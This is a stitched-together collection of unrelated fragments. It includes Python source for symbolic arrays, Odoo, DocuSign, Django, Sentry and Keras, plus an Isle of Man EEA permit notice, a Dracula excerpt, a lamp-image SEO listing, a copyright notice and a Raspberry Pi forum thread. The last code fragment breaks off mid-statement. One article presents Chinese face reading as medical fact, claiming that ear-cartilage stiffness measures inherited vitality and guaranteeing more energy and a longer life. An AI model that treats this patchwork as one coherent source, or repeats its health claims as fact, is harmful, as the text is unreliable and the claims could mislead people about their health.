self._value_bits @property def index_max(self): return self._index_max def select(self, index): index = self.cast_index(index) return ArraySelect(self, index) def store(self, index, value): return ArrayStore(self, self.cast_index(index), self.cast_value(value)) def write(self, offset, buf): if not isinstance(buf, (Array, bytearray)): raise TypeError("Array or bytearray expected got {:s}".format(type(buf))) arr = self for i, val in enumerate(buf): arr = arr.store(offset + i, val) return arr def read(self, offset, size): return ArraySlice(self, offset, size) def __getitem__(self, index): if isinstance(index, slice): start, stop = self._fix_index(index) size = self._get_size(index) return ArraySlice(self, start, size) else: if self.index_max is not None: if not isinstance(index, Expression) and index >= self.index_max: raise IndexError return self.select(self.cast_index(index)) def __eq__(self, other): # FIXME taint def compare_buffers(a, b): if len(a) != len(b): return BoolConstant(False) cond = BoolConstant(True) for i in range(len(a)): cond = BoolAnd(cond.cast(a[i] == b[i]), cond) if cond is BoolConstant(False): return BoolConstant(False) return cond return compare_buffers(self, other) def __ne__(self, other): return BoolNot(self == other) def __hash__(self): return super().__hash__() @property def underlying_variable(self): array = self while not isinstance(array, ArrayVariable): array = array.array return array def read_BE(self, address, size): bytes = [] for offset in range(size): bytes.append(self.get(address + offset, 0)) return BitVecConcat(size * self.value_bits, *bytes) def read_LE(self, address, size): address = self.cast_index(address) bytes = [] for offset in range(size): bytes.append(self.get(address + offset, 0)) return BitVecConcat(size * self.value_bits, *reversed(bytes)) def write_BE(self, address, value, size): address = self.cast_index(address) value = BitVec(size * self.value_bits).cast(value) array = self for offset in range(size): array = array.store( address + offset, BitVecExtract(value, (size - 1 - offset) * self.value_bits, self.value_bits), ) return array def write_LE(self, address, value, size): address = self.cast_index(address) value = BitVec(size * self.value_bits).cast(value) array = self for offset in reversed(range(size)): array = array.store( address + offset, BitVecExtract(value, (size - 1 - offset) * self.value_bits, self.value_bits), ) return array def __add__(self, other): if not isinstance(other, (Array, bytearray)): raise TypeError("can't concat Array to {}".format(type(other))) if isinstance(other, Array): if self.index_bits != other.index_bits or self.value_bits != other.value_bits: raise ValueError("Array sizes do not match for concatenation") from .visitors import simplify # FIXME This should be related to a constrainSet new_arr = ArrayProxy( ArrayVariable( self.index_bits, self.index_max + len(other), self.value_bits, "concatenation{}".format(uuid.uuid1()), ) ) for index in range(self.index_max): new_arr[index] = simplify(self[index]) for index in range(len(other)): new_arr[index + self.index_max] = simplify(other[index]) return new_arr def __radd__(self, other): if not isinstance(other, (Array, bytearray, bytes)): raise TypeError("can't concat Array to {}".format(type(other))) if isinstance(other, Array): if self.index_bits != other.index_bits or self.value_bits != other.value_bits: raise ValueError("Array sizes do not match for concatenation") from .visitors import simplify # FIXME This should be related to a constrainSet new_arr = ArrayProxy( ArrayVariable( self.index_bits, self.index_max + len(other), self.value_bits, "concatenation{}".format(uuid.uuid1()), ) ) for index in range(len(other)): new_arr[index] = simplify(other[index]) _concrete_cache = new_arr._concrete_cache for index in range(self.index_max): new_arr[index + len(other)] = simplify(self[index]) new_arr._concrete_cache.update(_concrete_cache) return new_arr class ArrayVariable(Array, Variable): def __init__(self, index_bits, index_max, value_bits, name, *operands, **kwargs): super().__init__(index_bits, index_max, value_bits, name, **kwargs) @property def declaration(self): return f"(declare-fun {self.name} () (Array (_ BitVec {self.index_bits}) (_ BitVec {self.value_bits})))" class ArrayOperation(Array, Operation): def __init__(self, array: Array, *operands, **kwargs): super().__init__( array.index_bits, array.index_max, array.value_bits, array, *operands, **kwargs ) class ArrayStore(ArrayOperation): def __init__(self, array: "Array", index: "BitVec", value: "BitVec", *args, **kwargs): assert index.size == array.index_bits assert value.size == array.value_bits super().__init__(array, index, value, *args, **kwargs) @property def array(self): return self.operands[0] @property def name(self): return self.operands[0].name @property def index(self): return self.operands[1] @property def value(self): return self.operands[2] class ArraySlice(Array): def __init__( self, array: Union["Array", "ArrayProxy"], offset: int, size: int, *args, **kwargs ): if not isinstance(array, Array): raise ValueError("Array expected") if isinstance(array, ArrayProxy): array = array._array super().__init__(array.index_bits, array.index_max, array.value_bits, *args, **kwargs) self._array = array self._slice_offset = offset self._slice_size = size @property def underlying_variable(self): return self._array.underlying_variable @property def operands(self): return self._array.operands @property def index_bits(self): return self._array.index_bits @property def index_max(self): return self._slice_size @property def value_bits(self): return self._array.value_bits @property def taint(self): return self._array.taint def select(self, index): return self._array.select(index + self._slice_offset) def store(self, index, value): return ArraySlice( self._array.store(index + self._slice_offset, value), self._slice_offset, self._slice_size, ) class ArrayProxy(Array): def __init__(self, array: Array, default: Optional[int] = None): self._default = default self._concrete_cache: Dict[int, int] = {} self._written = None if isinstance(array, ArrayProxy): # copy constructor super().__init__(array.index_bits, array.index_max, array.value_bits) self._array: Array = array._array self._name: str = array._name if default is None: self._default = array._default self._concrete_cache = dict(array._concrete_cache) self._written = set(array.written) elif isinstance(array, ArrayVariable): # fresh array proxy super().__init__(array.index_bits, array.index_max, array.value_bits) self._array = array self._name = array.name else: # arrayproxy for a prepopulated array super().__init__(array.index_bits, array.index_max, array.value_bits) self._name = array.underlying_variable.name self._array = array @property def underlying_variable(self): return self._array.underlying_variable @property def array(self): return self._array @property def name(self): return self._name @property def operands(self): return self._array.operands @property def index_bits(self): return self._array.index_bits @property def index_max(self): return self._array.index_max @property def value_bits(self): return self._array.value_bits @property def taint(self): return self._array.taint def select(self, index): return self.get(index) def store(self, index, value): if not isinstance(index, Expression): index = self.cast_index(index) if not isinstance(value, Expression): value = self.cast_value(value) from .visitors import simplify index = simplify(index) if isinstance(index, Constant): self._concrete_cache[index.value] = value else: # delete all cache as we do not know what this may overwrite. self._concrete_cache = {} # potentially generate and update .written set self.written.add(index) self._array = self._array.store(index, value) return self def __getitem__(self, index): if isinstance(index, slice): start, stop = self._fix_index(index) size = self._get_size(index) array_proxy_slice = ArrayProxy(ArraySlice(self, start, size), default=self._default) array_proxy_slice._concrete_cache = {} for k, v in self._concrete_cache.items(): if k >= start and k < start + size: array_proxy_slice._concrete_cache[k - start] = v for i in self.written: array_proxy_slice.written.add(i - start) return array_proxy_slice else: if self.index_max is not None: if not isinstance(index, Expression) and index >= self.index_max: raise IndexError return self.get(index, self._default) def __setitem__(self, index, value): if isinstance(index, slice): start, stop = self._fix_index(index) size = self._get_size(index) assert len(value) == size for i in range(size): self.store(start + i, value[i]) else: self.store(index, value) def __getstate__(self): state = {} state["_default"] = self._default state["_array"] = self._array state["name"] = self.name state["_concrete_cache"] = self._concrete_cache state["_written"] = self._written return state def __setstate__(self, state): self._default = state["_default"] self._array = state["_array"] self._name = state["name"] self._concrete_cache = state["_concrete_cache"] self._written = state["_written"] def __copy__(self): return ArrayProxy(self) @property def written(self): # Calculate only first time if self._written is None: written = set() # take out Proxy sleve array = self._array offset = 0 while isinstance(array, ArraySlice): # if it is a proxy over a slice take out the slice too offset += array._slice_offset array = array._array while not isinstance(array, ArrayVariable): # The index written to underlaying Array are displaced when sliced written.add(array.index - offset) array = array.array assert isinstance(array, ArrayVariable) self._written = written return self._written def is_known(self, index): if isinstance(index, Constant) and index.value in self._concrete_cache: return BoolConstant(True) is_known_index = BoolConstant(False) written = self.written for known_index in written: if isinstance(index, Constant) and isinstance(known_index, Constant): if known_index.value == index.value: return BoolConstant(True) is_known_index = BoolOr(is_known_index.cast(index == known_index), is_known_index) return is_known_index def get(self, index, default=None): if default is None: default = self._default index = self.cast_index(index) if self.index_max is not None: from .visitors import simplify index = simplify( BitVecITE(self.index_bits, index < 0, self.index_max + index + 1, index) ) if isinstance(index, Constant) and index.value in self._concrete_cache: return self._concrete_cache[index.value] value = self._array.select(index) if default is None: return value is_known = self.is_known(index) default = self.cast_value(default) return BitVecITE(self._array.value_bits, is_known, value, default) class ArraySelect(BitVec, Operation): def __init__(self, array: "Array", index: "BitVec", *args, **kwargs): assert index.size == array.index_bits super().__init__(array.value_bits, array, index, *args, **kwargs) @property def array(self): return self.operands[0] @property def index(self): return self.operands[1] def __repr__(self): return f"<ArraySelect obj with index={self.index}:\n{self.array}>" class BitVecSignExtend(BitVecOperation): def __init__(self, operand: "BitVec", size_dest: int, *args, **kwargs): assert size_dest >= operand.size super().__init__(size_dest, operand, *args, **kwargs) self.extend = size_dest - operand.size class BitVecZeroExtend(BitVecOperation): def __init__(self, size_dest: int, operand: "BitVec", *args, **kwargs): assert size_dest >= operand.size super().__init__(size_dest, operand, *args, **kwargs) self.extend = size_dest - operand.size class BitVecExtract(BitVecOperation): def __init__(self, operand: "BitVec", offset: int, size: int, *args, **kwargs): assert offset >= 0 and offset + size <= operand.size super().__init__(size, operand, *args, **kwargs) self._begining = offset self._end = offset + size - 1 @property def value(self): return self.operands[0] @property def begining(self): return self._begining @property def end(self): return self._end class BitVecConcat(BitVecOperation): def __init__(self, size_dest: int, *operands, **kwargs): assert all(isinstance(x, BitVec) for x in operands) assert size_dest == sum(x.size for x in operands) super().__init__(size_dest, *operands, **kwargs) class BitVecITE(BitVecOperation): def __init__( self, size: int, condition: Union["Bool", bool], true_value: "BitVec", false_value: "BitVec", *args, **kwargs, ): assert true_value.size == size assert false_value.size == size super().__init__(size, condition, true_value, false_value, *args, **kwargs)
A family permit is a type of entry clearance issued to direct and extended family members of an EEA National, who is in, or intends to come to the Isle of Man to exercise free movement rights. An EEA family permit makes it easier and quicker to enter the UK. You might not get a boarding pass and could experience major delays without one. You may be refused entry into the UK if you don’t have an EEA family permit. Direct and extended family members of an EEA National may apply for a family permit and this is currently £65. For more information about the rights of the EEA citizens and their families to come to live and work in the Isle of Man please refer to the Isle of Man Immigration Rules and the Immigration (European Economic Area) Regulations 2009 as amended. You must be outside the UK and Isle of Man to apply for an EEA family permit. An EEA family permit is valid for 6 months. You can leave and enter the Isle of Man and UK as many times as you need within that time. Once you have arrived in the Isle of Man, an application must be made to extend your permit to 5 years.
# -*- coding: utf-8 -*- import copy import openerp from openerp.exceptions import AccessError from openerp.osv import osv from lxml import etree, html from openerp import api class view(osv.osv): _inherit = 'ir.ui.view' @api.cr_uid_ids_context def render(self, cr, uid, id_or_xml_id, values=None, engine='ir.qweb', context=None): if not values: values = {} if values.get('editable'): try: if not isinstance(id_or_xml_id, (int, long)): if '.' not in id_or_xml_id: raise ValueError('Invalid template id: %r' % (id_or_xml_id,)) id_or_xml_id = self.get_view_id(cr, uid, id_or_xml_id, context=context) self.check_access_rule(cr, uid, [id_or_xml_id], 'write', context=context) except AccessError: values['editable'] = False return super(view, self).render(cr, uid, id_or_xml_id, values=values, engine=engine, context=context) #------------------------------------------------------ # Save from html #------------------------------------------------------ def extract_embedded_fields(self, cr, uid, arch, context=None): return arch.xpath('//*[@data-oe-model != "ir.ui.view"]') def save_embedded_field(self, cr, uid, el, context=None): Model = self.pool[el.get('data-oe-model')] field = el.get('data-oe-field') converter = self.pool['ir.qweb'].get_converter_for(el.get('data-oe-type')) value = converter.from_html(cr, uid, Model, Model._fields[field], el) if value is not None: # TODO: batch writes? Model.write(cr, uid, [int(el.get('data-oe-id'))], { field: value }, context=context) def _pretty_arch(self, arch): # remove_blank_string does not seem to work on HTMLParser, and # pretty-printing with lxml more or less requires stripping # whitespace: http://lxml.de/FAQ.html#why-doesn-t-the-pretty-print-option-reformat-my-xml-output # so serialize to XML, parse as XML (remove whitespace) then serialize # as XML (pretty print) arch_no_whitespace = etree.fromstring( etree.tostring(arch, encoding='utf-8'), parser=etree.XMLParser(encoding='utf-8', remove_blank_text=True)) return etree.tostring( arch_no_whitespace, encoding='unicode', pretty_print=True) def replace_arch_section(self, cr, uid, view_id, section_xpath, replacement, context=None): # the root of the arch section shouldn't actually be replaced as it's # not really editable itself, only the content truly is editable. [view] = self.browse(cr, uid, [view_id], context=context) arch = etree.fromstring(view.arch.encode('utf-8')) # => get the replacement root if not section_xpath: root = arch else: # ensure there's only one match [root] = arch.xpath(section_xpath) root.text = replacement.text root.tail = replacement.tail # replace all children del root[:] for child in replacement: root.append(copy.deepcopy(child)) return arch def to_field_ref(self, cr, uid, el, context=None): # filter out meta-information inserted in the document attributes = dict((k, v) for k, v in el.items() if not k.startswith('data-oe-')) attributes['t-field'] = el.get('data-oe-expression') out = html.html_parser.makeelement(el.tag, attrib=attributes) out.tail = el.tail return out def save(self, cr, uid, res_id, value, xpath=None, context=None): """ Update a view section. The view section may embed fields to write :param str model: :param int res_id: :param str xpath: valid xpath to the tag to replace """ res_id = int(res_id) arch_section = html.fromstring( value, parser=html.HTMLParser(encoding='utf-8')) if xpath is None: # value is an embedded field on its own, not a view section self.save_embedded_field(cr, uid, arch_section, context=context) return for el in self.extract_embedded_fields(cr, uid, arch_section, context=context): self.save_embedded_field(cr, uid, el, context=context) # transform embedded field back to t-field el.getparent().replace(el, self.to_field_ref(cr, uid, el, context=context)) arch = self.replace_arch_section(cr, uid, res_id, xpath, arch_section, context=context) self.write(cr, uid, res_id, { 'arch': self._pretty_arch(arch) }, context=context) view = self.browse(cr, openerp.SUPERUSER_ID, res_id, context=context) if view.model_data_id: view.model_data_id.write({'noupdate': True})
Another surprise. Mina woke me early, about the same time as yesterday, and asked me to bring Dr. Van Helsing. I thought that it was another occassion for hypnotism, and without question went for the Professor. He had evidently expected some such call, for I found him dressed in his room. His door was ajar, so that he could hear the opening of the door of our room. He came at once. As he passed into the room, he asked Mina if the others might come, too. “But why, dear Madam Mina? You know that your safety is our solemnest duty. We go into danger, to which you are, or may be, more liable than any of us from . . . from circumstances . . . things that have been.” He paused embarrassed. As she replied, she raised her finger and pointed to her forehead. “I know. That is why I must go. I can tell you now, whilst the sun is coming up. I may not be able again. I know that when the Count wills me I must go. I know that if he tells me to come in secret, I must by wile. By any device to hoodwink, even Jonathan.” God saw the look that she turned on me as she spoke, and if there be indeed a Recording Angel that look is noted to her ever-lasting honor. I could only clasp her hand. I could not speak. My emotion was too great for even the relief of tears. When he had spoken, Mina’s long spell of silence made me look at her. She had fallen back on her pillow asleep. She did not even wake when I had pulled up the blind and let in the sunlight which flooded the room. Van Helsing motioned to me to come with him quietly. We went to his room, and within a minute Lord Godalming, Dr. Seward, and Mr. Morris were with us also. “What shall we do exactly?”asked Mr. Morris laconically. “I shall not wait for any opportunity,” said Morris. “When I see the box I shall open it and destroy the monster, though there were a thousand men looking on, and if I am to be wiped out for it the next moment!” I grasped his hand instinctively and found it as firm as a piece of steel. I think he understood my look. I hope he did. There was nothing further to be said, and we parted. I shall now settle up all my affairs of earth, and be ready for whatever may come. Later.–It is done. My will is made, and all complete. Mina if she survive is my sole heir. If it should not be so, then the others who have been so good to us shall have remainder. It is now drawing towards the sunset. Mina’s uneasiness calls my attention to it. I am sure that there is something on her mind which the time of exact sunset will reveal. These occasions are becoming harrowing times for us all. For each sunrise and sunset opens up some new danger, some new pain, which however, may in God’s will be means to a good end. I write all these things in the diary since my darling must not hear them now. But if it may be that she can see them again, they shall be ready. She is calling to me.
from distutils.core import setup import os here_dir = os.path.abspath(os.path.dirname(__file__)) def readme(): with open(os.path.join(here_dir, 'README.rst')) as f: return f.read() setup( name='bond', packages=['bond', 'bond.bond_helpers'], version='1.1.0', description='Testing with Spies and Mocks', long_description=readme(), summary='Testing with Spies and Mocks', author='George Necula, Erik Krogen', author_email='necula@cs.berkeley.edu', url='http://necula01.github.io/bond/', license='BSD', keywords=['testing', 'mocking'], package_dir={ 'bond' : 'bond' }, package_data={ 'bond' : [ 'AUTHORS.rst', 'LICENSE', 'README.rst'] }, classifiers=[ "Development Status :: 4 - Beta", "Intended Audience :: Developers", "Natural Language :: English", "License :: OSI Approved :: BSD License", "Operating System :: OS Independent", "Programming Language :: Python", "Programming Language :: Python :: 2", "Programming Language :: Python :: 2.6", "Programming Language :: Python :: 2.7", "Topic :: Software Development :: Libraries :: Python Modules", 'Topic :: Software Development :: Testing' ] )
Image Title: Titan Lighting 30 In Seafoam Green Glass Bottle Table Lamp TN Throughout Decor 0. Post Title: Green Glass Lamp. Filename: titan-lighting-30-in-seafoam-green-glass-bottle-table-lamp-tn-throughout-decor-0.jpg. Image Dimension: 1000 x 1000 pixels. Images Format: jpg/jpeg. Publisher/Author: Moses Wolff. Uploaded Date: Saturday - September 29th. 2018 20:19:08 PM. Category: Architecture. Image Source: homedit.com. Why You Should Have Green Lamp Shades For Table Lamps Lighting And Regarding Glass Designs 15. Fall Shopping Special Rita Blue Green Glass Accent Table Lamp Regarding Plan 3. Pair Of Large Emerald Green Glass Teardrop Lamps On Perspex Bases With Lamp Ideas 9. David Hunt Lighting Azores Single Light Large Table Lamp Base Only Regarding Green Glass Decor 1. Green Glass Teardrop Halsey Table Lamp Base World Market In Prepare 2. Green Glass Lamp Etsy With Regard To Prepare 14. Vintage Deco Jadeite Green Slag Glass Lamp Bread Butter Antiques Within Designs 12. Clift Glass Table Lamp Base Green Pottery Barn For Remodel 5. Marbro Lamp Company Pair Of Impressive Green Murano Glass Lamps With Regard To Prepare 16. Light Accents Bankers Lamp Desk With Green Glass Shade And Inside Designs 11.
#!/usr/bin/env python # coding=utf-8 """Sample script that demonstrates `pydocusign` usage for embedded signing. See also http://iodocs.docusign.com/APIWalkthrough/embeddedSigning """ from __future__ import print_function import hashlib import os import uuid import pydocusign from pydocusign.test import fixtures_dir try: raw_input except NameError: raw_input = input def prompt(environ_key, description, default): try: return os.environ[environ_key] except KeyError: value = raw_input('{description} (default: "{default}"): '.format( default=default, description=description)) if not value: return default else: return value # Get configuration from environment or prompt the user... root_url = prompt( 'DOCUSIGN_ROOT_URL', 'DocuSign API URL', 'https://demo.docusign.net/restapi/v2') username = prompt( 'DOCUSIGN_USERNAME', 'DocuSign API username', '') password = prompt( 'DOCUSIGN_PASSWORD', 'DocuSign API password', '') integrator_key = prompt( 'DOCUSIGN_INTEGRATOR_KEY', 'DocuSign API integrator key', '') callback_url = prompt( 'DOCUSIGN_TEST_CALLBACK_URL', 'Envelope callback URL', '') signer_return_url = prompt( 'DOCUSIGN_TEST_SIGNER_RETURN_URL', 'Signer return URL', '') # Create a client. client = pydocusign.DocuSignClient( root_url=root_url, username=username, password=password, integrator_key=integrator_key, ) # Login. Updates API URLs in client. print("1. GET /login_information") login_information = client.login_information() print(" Received data: {data}".format(data=login_information)) # Prepare list of signers. Ordering matters. signers = [ pydocusign.Signer( email='jean.francais@example.com', name=u'Jean Français', recipientId=1, clientUserId=str(uuid.uuid4()), # Something unique in your database. tabs=[ pydocusign.SignHereTab( documentId=1, pageNumber=1, xPosition=100, yPosition=100, ), ], emailSubject='Voici un sujet', emailBody='Voici un message', supportedLanguage='fr', ), pydocusign.Signer( email='paul.english@example.com', name=u'Paul English', recipientId=2, clientUserId=str(uuid.uuid4()), # Something unique in your database. tabs=[], # No tabs means user places tabs himself in DocuSign UI. emailSubject='Here is a subject', emailBody='Here is a message', supportedLanguage='en', ), ] # Create envelope with embedded signing. print("2. POST {account}/envelopes") event_notification = pydocusign.EventNotification( url=callback_url, ) document_path = os.path.join(fixtures_dir(), 'test.pdf') document_2_path = os.path.join(fixtures_dir(), 'test2.pdf') with open(document_path, 'rb') as pdf, open(document_2_path, 'rb') as pdf_2: envelope = pydocusign.Envelope( documents=[ pydocusign.Document( name='document.pdf', documentId=1, data=pdf, ), pydocusign.Document( name='document_2.pdf', documentId=2, data=pdf_2, ), ], emailSubject='This is the subject', emailBlurb='This is the body', eventNotification=event_notification, status=pydocusign.Envelope.STATUS_SENT, recipients=signers, ) client.create_envelope_from_documents(envelope) print(" Received envelopeId {id}".format(id=envelope.envelopeId)) # Update recipient list of envelope: fetch envelope's ``UserId`` from DocuSign. print("3. GET {account}/envelopes/{envelopeId}/recipients") envelope.get_recipients() print(" Received UserId for recipient 0: {0}".format( envelope.recipients[0].userId)) print(" Received UserId for recipient 1: {0}".format( envelope.recipients[1].userId)) # Retrieve embedded signing for first recipient. print("4. Get DocuSign Recipient View") signing_url = envelope.post_recipient_view( envelope.recipients[0], returnUrl=signer_return_url) print(" Received signing URL for recipient 0: {0}".format(signing_url)) signing_url = envelope.post_recipient_view( envelope.recipients[1], returnUrl=signer_return_url) print(" Received signing URL for recipient 1: {0}".format(signing_url)) # Download signature documents. print("5. List signature documents.") document_list = envelope.get_document_list() print(" Received document list: {0}".format(document_list)) print("6. Download documents from DocuSign.") for signed_document in document_list: document = envelope.get_document(signed_document['documentId']) document_sha = hashlib.sha1(document.read()).hexdigest() print(" Document SHA1: {0}".format(document_sha)) print("7. Download signature certificate from DocuSign.") document = envelope.get_certificate() document_sha = hashlib.sha1(document.read()).hexdigest() print(" Certificate SHA1: {0}".format(document_sha))
The foundational principle of Chinese Medicine is the concept of “Jing”, which is often described as our constitutional makeup. Jing includes all physical inheritance along with the talents and abilities and potential that has been passed down from ancestors. It can also be described as the unique and personal mixture of strengths or predispositions for deficiencies in physical, emotional and mental abilities combined with an equally unusual assortment of personality traits. Each person is born with an intrinsic amount of Jing, or inherited constitution. Jing is like the battery that each person is given to live from for the rest of his or her life. People’s batteries may be different sizes, but they all start out fully charged. Likewise, some people are born with very strong constitutions and others start out with more delicacy. However, what is most important is how well you guard this vital energy no matter how much energy you start out with. Therefore, protecting and safeguarding Jing is one of the most important teachings of Chinese Medicine. Overuse of Jing leads to injuries and illnesses and preserving Jing, which enhances health and encourages longevity. So the first thing to find out is how much intrinsic Jing you have and then look for clues about how you are managing it and Chinese Face Reading has just the clues to help you find out. The best way to measure Jing is from the cartilage of the upper ear. If you grasp it firmly between your fingers and then pull it a bit back and forth, you can get an idea of how stiff and strong it is. Ideally, the ear cartilage should be fairly stiff, but with a slight ability to bend. This means that there is a good amount of inherent Jing. Softer, thinner and more flexible ears have less strength, but are still considered healthy. The difference is that people with very strong Jing get sick less often, if they get sick at all and have the ability to live longer than people with ears that are flimsier. However, this is only if they take care of their Jing. Medium ears still give a fairly strong constitution, but the person who possesses these ears gets sick easier and more often. This is not to say that they will die younger, for if they manage their Jing well, they may in fact live longer than someone who has very strong ears. This is because Jing Management is the most important aspect of longevity. Many times, people who have strong constitutions don’t pay attention to the warning signs and allow minor problems to become big problems. People who have been sick more often in their lives usually know not only how to take care of themselves when they become sick, they often know how to defuse an illness by taking good care of themselves when they feel the initial symptoms. This is preventative medicine and a crucial aspect of good health. So, it is actually much less important how much Jing you started out with than how well you take care of it. However, everyone has to use Jing over a lifetime. The key is to not overuse it too fast or illnesses or injuries occur at too young of an age. I call this “Jing Blowout.” Jing is supposed to be used gradually and whenever it is overused, it is necessary to make Qi to buffer the use of Jing. And, ancient Chinese Medicine has only two ways to make Jing and other ways to preserve it. The first way to make Qi to preserve Jing is by eating food. Good food transforms into energy, but not just any food will do. The ancient Chinese believed that a line on the bridge of the nose between the eyes indicated the need to eat appropriately for your body’s needs. I was taught by my Chinese Grandmother that food had to excite the palate and energetically expand with a kind of joy when you eat it because it tastes so good and feels so satisfying. It could really be any kind of food, but your body had to want it at that time and you had to provide it. She believed that you didn’t need to eat a lot of it and that it didn’t make you gain weight because it was so right for you. It is also very different from the kind of craving that you have based on emotional needs, where you can’t eat enough and then feel somewhat sick afterwards. Instead this kind of eating is satiating and enjoyable. It also makes more energy to live on so that you don’t have to use up more Jing. The second way to make Qi is to by breathing. A marking across the philtrum between the nose and the mouth is a sign that this kind of Qi needs to be made. This is not just regular breathing, breath only transforms when you get to the place called the “time between breaths” where you don’t need to breathe in so deeply for a short while and inspires creativity and spirituality. Only then does breath transform into Qi. Now there are many ways of breathing deeply and all are good, but I was taught a very simple method that involved breathing out longer than you breathed in to detoxify the body and fully oxygenate the blood. Singing was a very natural example of this better kind of breathing. And, when you breathe this way for only a little while, it gets you back into the present numinous moment where anything is possible and the upwelling of creativity emerges. This is such a necessary place to live for all creative people. Finally, in order to preserve the most Jing and QI, it is necessary to live a more regular life with adequate rest and sleep. This is much more important than most people realize and the entire beginning of the Yellow Emperor’s Classic of Chinese Medicine is devoted to this topic. The kidneys, which are associated with Jing need to be laying down to rest and the brain and the emotions need to be quiet. If enough rest and sleep is not achieved, then it is important to meditate and take breaks from acitivity. Although these ancient tips for health and longevity are easy to understand, they are much harder to put into practice. If you try to live this way, I guarantee that you will feel more energetic and hopefully live longer too.
""" Tests for the update() queryset method that allows in-place, multi-object updates. """ from django.db import models class DataPoint(models.Model): name = models.CharField(max_length=20) value = models.CharField(max_length=20) another_value = models.CharField(max_length=20, blank=True) def __str__(self): return self.name class RelatedPoint(models.Model): name = models.CharField(max_length=20) data = models.ForeignKey(DataPoint, models.CASCADE) def __str__(self): return self.name class A(models.Model): x = models.IntegerField(default=10) class B(models.Model): a = models.ForeignKey(A, models.CASCADE) y = models.IntegerField(default=10) class C(models.Model): y = models.IntegerField(default=10) class D(C): a = models.ForeignKey(A, models.CASCADE) class Foo(models.Model): target = models.CharField(max_length=10, unique=True) class Bar(models.Model): foo = models.ForeignKey(Foo, models.CASCADE, to_field='target') m2m_foo = models.ManyToManyField(Foo, related_name='m2m_foo')
The following describes the Copyright Notice for our Master Domaining website. The entire contents of our Master Domaining website are protected by intellectual property law, including international copyright and trademark laws. The owner of the copyrights and/or trademarks are our website, and/or other third party licensors or related entities. You are granted a nonexclusive, nontransferable, revocable license to use our Master Domaining website only for private, personal, noncommercial reasons. You may print and download portions of material from the different areas of the website solely for your own non-commercial use, provided that you agree not to change the content from its original form. Moreover, you agree not to modify or delete any copyright or proprietary notices from the materials you print or download from Master Domaining. Also note that any notice on any portion of our website that forbids printing & downloading trumps all prior statements and controls. As a user at Master Domaining, you agree to use the products and services offered by our website in a manner consistent with all applicable local, state and federal laws and regulations. No material shall be stored or transmitted which infringes or violates the rights of others, which is unlawful, obscene, profane, indecent or otherwise objectionable, threatening, defamatory, or invasive of privacy or publicity rights. Our website prohibits conduct that might constitute a criminal offense, give rise to civil liability or otherwise violate any law. Any activity that restricts or inhibits any other Master Domaining user from using the services of our website is also prohibited. Unless allowed by a written agreement, you may not post or transmit advertising or commercial solicitation on our website.
# -*- coding: utf-8 -*- from __future__ import absolute_import import six from sentry.api.serializers import serialize from sentry.incidents.logic import create_alert_rule from sentry.incidents.models import AlertRuleThresholdType from sentry.snuba.models import QueryAggregations from sentry.testutils import TestCase class AlertRuleSerializerTest(TestCase): def test_simple(self): alert_rule = create_alert_rule( self.organization, [self.project], "hello", AlertRuleThresholdType.ABOVE, "level:error", QueryAggregations.TOTAL, 10, 1000, 400, 1, ) result = serialize(alert_rule) assert result["id"] == six.text_type(alert_rule.id) assert result["projectId"] == six.text_type( alert_rule.query_subscriptions.first().project_id ) assert result["name"] == alert_rule.name assert result["thresholdType"] == alert_rule.threshold_type assert result["dataset"] == alert_rule.dataset assert result["query"] == alert_rule.query assert result["aggregation"] == alert_rule.aggregation assert result["timeWindow"] == alert_rule.time_window assert result["resolution"] == alert_rule.resolution assert result["alertThreshold"] == alert_rule.alert_threshold assert result["resolveThreshold"] == alert_rule.resolve_threshold assert result["thresholdPeriod"] == alert_rule.threshold_period assert result["dateModified"] == alert_rule.date_modified assert result["dateAdded"] == alert_rule.date_added
Back Powering the Pi via the GPIO Header? Looking at designing a HAT which will supply 5V power to the RPi. As a result I'm looking at the notes on back powering and specifically the link to the back powering diagram. That diagram just show that I need a protection diode in the HAT design, but isn't too specific about the type of diode or any specification for that diode. I'm not an expert but I've seen where people use MOSFET instead of Diodes because of the much reduced voltage drop in the protection circuit. Could that design be used or should a diode, (Schottky?) be used? Re: Back Powering the Pi via the GPIO Header? If you want a diode use a Shottky as they have low voltage drop. You should also add a polyfuse if you power through the GPIO Header. I recently stopped powering via the GPIO header as I had been for several months, and instead started using PP1 and the underside of pin 6. Using this configuration allows me to bypass the micro USB port, but still have the polyfuse.
# Copyright 2015 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== # pylint: disable=protected-access """Contains the `Node` class.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function import collections import copy import json import numpy as np from tensorflow.python.framework import ops from tensorflow.python.framework import tensor_util from tensorflow.python.keras import backend from tensorflow.python.keras.engine import base_layer_utils from tensorflow.python.keras.engine import keras_tensor from tensorflow.python.keras.saving.saved_model import json_utils from tensorflow.python.keras.utils import tf_utils from tensorflow.python.util import nest _CONSTANT_VALUE = '_CONSTANT_VALUE' class Node(object): """A `Node` describes the connectivity between two layers. Each time a layer is connected to some new input, a node is added to `layer._inbound_nodes`. Each time the output of a layer is used by another layer, a node is added to `layer._outbound_nodes`. Arguments: layer: The Layer for the Layer.__call__ this node represents. call_args: The positional arguments the Layer was called with. call_kwargs: The keyword arguments the Layer was called with. outputs: The outputs of the Layer.__call__ """ def __init__(self, layer, call_args=None, call_kwargs=None, outputs=None): call_args = [] if call_args is None else call_args call_kwargs = {} if call_kwargs is None else call_kwargs outputs = [] if outputs is None else outputs self.layer = layer self.is_input = not call_args and not call_kwargs # These arguments are user-provided. Copy the structures here so that # future user modifications do not affect the node's metadata. # We copy using map_structure rather than python's shallow or deep copy, # because the args can be data structures (so shallow copy is # insufficient), but individual values might not support copy.copy # or be too expensive to deep copy. call_args = nest.map_structure(lambda t: t, call_args) call_kwargs = nest.map_structure(lambda t: t, call_kwargs) self.outputs = nest.map_structure(lambda t: t, outputs) self.call_args = call_args self.call_kwargs = call_kwargs # Cached for performance. self._flat_arguments = nest.flatten((self.call_args, self.call_kwargs)) # Used to avoid expensive `nest` operations in the most common case. self._single_positional_tensor_passed = (not self.call_kwargs and len( self.call_args) == 1 and tensor_util.is_tensor(self.call_args[0])) if not keras_tensor.keras_tensors_enabled(): # Create TensorFlowOpLayers if needed. for obj in self._flat_arguments: if (isinstance(obj, ops.Tensor) and 